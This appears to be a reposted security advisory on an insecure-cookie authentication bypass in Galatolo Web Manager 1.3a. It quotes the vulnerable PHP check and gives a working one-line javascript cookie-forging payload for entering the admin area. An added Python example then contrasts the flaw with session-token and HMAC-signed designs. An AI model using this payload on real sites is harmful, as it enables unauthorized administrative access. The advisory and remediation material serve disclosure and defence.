
    Galatolo Web Manager 1.3a Insecure Cookie Handling Vulnerability

    Posted by: 山止川行 | Posted: 2025-6-28 22:47 | Views: 56 | Comments: 0

    ############################################################################################
      #                                                                                          #
      #      ...:::::Galatolo Web Manager 1.3a Insecure Cookie Handling Vulnerability ::::....   #           
      ############################################################################################

    Virangar Security Team

    www.virangar.net
    www.virangar.ir

    --------
    Discovered by: virangar security team (hadihadi)

    special thanks to: MR.nosrati, black.shadowes, MR.hesy, Zahra

    & all virangar members & all hackerz

    greetz: to my best friend in the world hadi_aryaie2004
    & my lovely friend arash (imm02tal)
    -------
    DESCRIPTION:
    Galatolo Web Manager suffers from insecure cookie handling. When an admin login succeeds, the script
    sets cookies that the rest of the admin area treats as proof that the user is already logged in.
    The problem is that these cookies are trusted as-is: they are plain client-controlled values, not bound
    to a server-side session and not protected by any signature, so nothing in them is a secret the attacker
    lacks. An attacker can therefore craft the cookies and the admin area behaves as if a legitimate admin
    were logged in.
    ---
    vuln code in /Admin/index.php:

    // The admin area recomputes the role on every request from the two cookies the browser
    // sends back; $HTTP_COOKIE_VARS is the PHP 4-era name for $_COOKIE. Both values are under
    // the client's control and nothing ties them to server-side state, so the check is only
    // as strong as whatever grado() does with them.
    if (grado($HTTP_COOKIE_VARS["gwm_user"],$HTTP_COOKIE_VARS["gwm_pass"]) == "admin" ||
        grado($HTTP_COOKIE_VARS["gwm_user"],$HTTP_COOKIE_VARS["gwm_pass"]) == "editor" ){
        top();
        menu();
        echo $wellcome_admin;
        foot();
    }

    Note that grado() itself is not shown in the advisory, so the exact test it applies to the
    cookie-supplied gwm_pass is not visible here; the proof of concept below simply sets it to "admin".
    ---
    exploit:
    javascript:document.cookie = "gwm_user=admin; path=/"; document.cookie = "gwm_pass=admin; path=/";
    -----
    Run this while you are on the target site (document.cookie only sets cookies for the origin the
    page is currently on), then visit /Admin/index.php: the check above sees the two cookies and lets you
    into the admin area to manage the CMS ;)
    Many modern browsers refuse or strip javascript: URLs typed into the address bar; the browser's
    developer console, or any HTTP client that sends the same two cookies, works just as well.
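    The following is an added example, not code from the original advisory or from Galatolo Web Manager.
    It models the authorization pattern quoted above (the role is re-derived on every request from two
    client-supplied cookies) and contrasts it with two designs that a forged cookie cannot pass: an opaque
    random session token whose state lives only on the server, and a stateless cookie signed with an HMAC.
    grado() is not shown in the advisory, so grado_model() below is an assumption that mirrors the
    advisory's claim that no real password is needed; the user table, cookie names other than gwm_user and
    gwm_pass, and the passwords are constructed for the example.

```python
# Added example; not part of the Galatolo Web Manager code base or the advisory.
import hmac
import hashlib
import secrets

# Constructed sample user table: username -> (password, role).
USERS = {
    "admin": ("correct-horse-battery", "admin"),
    "editor": ("editor-pw", "editor"),
    "bob": ("bob-pw", "user"),
}
ADMIN_ROLES = ("admin", "editor")


def grado_model(user, _password):
    """ASSUMED model of grado(): the role is looked up from the cookie-supplied
    username alone, so any gwm_pass value is accepted (grado() is not shown)."""
    entry = USERS.get(user)
    return entry[1] if entry else None


def admin_area_vulnerable(cookies):
    """The pattern from /Admin/index.php: trust whatever cookies the client sent."""
    role = grado_model(cookies.get("gwm_user"), cookies.get("gwm_pass"))
    return role in ADMIN_ROLES


# --- Fix 1: opaque random session token, all state kept on the server ----------
SESSIONS = {}  # token -> (user, role); never leaves the server


def login(user, password):
    """Verify the credentials once, then hand out an unguessable token."""
    entry = USERS.get(user)
    if entry is None or not hmac.compare_digest(entry[0].encode(), password.encode()):
        return None
    token = secrets.token_urlsafe(32)  # 256 bits of randomness
    SESSIONS[token] = (user, entry[1])
    return token


def admin_area_session(cookies):
    """The role comes from server-side state keyed by the token; the cookie
    value carries no identity the client could edit to become admin."""
    sess = SESSIONS.get(cookies.get("gwm_session", ""))
    return sess is not None and sess[1] in ADMIN_ROLES


# --- Fix 2: stateless cookie, integrity-protected with an HMAC -----------------
SECRET = secrets.token_bytes(32)  # generated at startup here; real apps load it from config


def sign_cookie(user, role):
    """Issued by the server after a successful login: user|role|hex(HMAC-SHA256)."""
    msg = f"{user}|{role}".encode()
    tag = hmac.new(SECRET, msg, hashlib.sha256).hexdigest()
    return f"{user}|{role}|{tag}"


def admin_area_signed(cookies):
    """Accept the role only if the tag verifies; a client without SECRET cannot
    produce a valid tag for 'admin|admin'."""
    parts = cookies.get("gwm_auth", "").rsplit("|", 1)
    if len(parts) != 2:
        return False
    msg, tag = parts
    expected = hmac.new(SECRET, msg.encode(), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(expected, tag):  # forged or tampered cookie
        return False
    role = msg.rsplit("|", 1)[1]
    return role in ADMIN_ROLES


def demo():
    """Replay the advisory's forged cookie against all three checks."""
    forged = {"gwm_user": "admin", "gwm_pass": "admin"}  # the advisory's exploit cookie
    results = {
        "vulnerable_forged": admin_area_vulnerable(forged),
        "session_forged": admin_area_session({"gwm_session": "admin"}),
        "signed_forged": admin_area_signed({"gwm_auth": "admin|admin|" + "0" * 64}),
    }
    token = login("admin", "correct-horse-battery")
    results["session_legit"] = admin_area_session({"gwm_session": token})
    results["signed_legit"] = admin_area_signed({"gwm_auth": sign_cookie("admin", "admin")})
    return results


if __name__ == "__main__":
    for name, ok in demo().items():
        print(f"{name}: {ok}")
```

    Both fixes share the property the original lacks: the cookie proves something the client could not
    have produced on its own (possession of a random token, or a tag computed with a server-side key),
    rather than merely naming the role it would like to have. The server-side session also makes logout
    and revocation trivial, which the signed cookie does not.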
    -------
    young iranian h4ck3rz

    Source: https://www.jb51.net/hack/5682.html
